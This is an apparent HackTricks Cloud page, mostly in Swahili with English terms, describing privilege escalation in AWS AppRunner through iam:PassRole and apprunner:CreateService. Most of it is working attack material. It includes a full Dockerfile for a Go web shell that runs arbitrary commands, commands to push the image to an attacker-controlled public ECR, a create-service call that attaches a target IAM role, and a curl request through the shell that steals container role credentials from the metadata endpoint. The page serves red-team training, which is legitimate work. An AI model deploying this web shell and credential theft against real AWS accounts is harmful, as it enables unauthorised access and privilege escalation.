AWS - AppRunner Privesc

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

AppRunner

iam:PassRole, apprunner:CreateService

Mshambuliaji mwenye vibali hivi anaweza kuunda service ya AppRunner yenye IAM role iliyounganishwa, na hivyo anaweza kuongeza mamlaka kwa kupata credentials za role hiyo.

Mshambuliaji kwanza huunda Dockerfile inayotumika kama web shell kwa kutekeleza amri yoyote kwenye container ya AppRunner.

FROM golang:1.24-bookworm
WORKDIR /app
RUN apt-get update && apt-get install -y ca-certificates curl
RUN cat <<'EOF' > main.go
package main

import (
"fmt"
"net/http"
"os/exec"
)

func main() {
http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
command := exec.Command("sh", "-c", r.URL.Query().Get("cmd"))
output, err := command.CombinedOutput()
if err != nil {
fmt.Fprint(w, err.Error(), output)
return
}

fmt.Fprint(w, string(output))
})
http.ListenAndServe("0.0.0.0:3000", nil)
}
EOF
RUN go mod init test && go build -o main .
EXPOSE 3000
CMD ["./main"]

Kisha, push image hii kwenye ECR repository.

Kwa ku-push image kwenye public repository ndani ya AWS account inayodhibitiwa na attacker, privilege escalation inawezekana hata kama victim’s account haina permissions za ku-manipulate ECR.

IMAGE_NAME=public.ecr.aws/<alias>/<namespace>/<repo-name>:latest
docker buildx build --platform linux/amd64 -t $IMAGE_NAME .
aws ecr-public get-login-password | docker login --username AWS --password-stdin public.ecr.aws
docker push $IMAGE_NAME
docker logout public.ecr.aws

Ifuatayo, mshambuliaji anaunda huduma ya AppRunner iliyosanidiwa na web shell image hii na IAM Role wanayotaka exploit.

aws apprunner create-service \
--service-name malicious-service \
--source-configuration '{
"ImageRepository": {
"ImageIdentifier": "public.ecr.aws/<alias>/<namespace>/<repo-name>:latest",
"ImageRepositoryType": "ECR_PUBLIC",
"ImageConfiguration": { "Port": "3000" }
}
}' \
--instance-configuration '{"InstanceRoleArn": "arn:aws:iam::123456789012:role/AppRunnerRole"}' \
--query Service.ServiceUrl

Baada ya kusubiri uundaji wa service kukamilika, tumia web shell kupata container credentials na kupata ruhusa za IAM Role iliyounganishwa na AppRunner.

curl 'https://<service-url>/?cmd=curl+http%3A%2F%2F169.254.170.2%24AWS_CONTAINER_CREDENTIALS_RELATIVE_URI'

Athari Inayowezekana: privilege escalation ya moja kwa moja kwa IAM role yoyote ambayo inaweza kuambatishwa kwenye huduma za AppRunner.

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.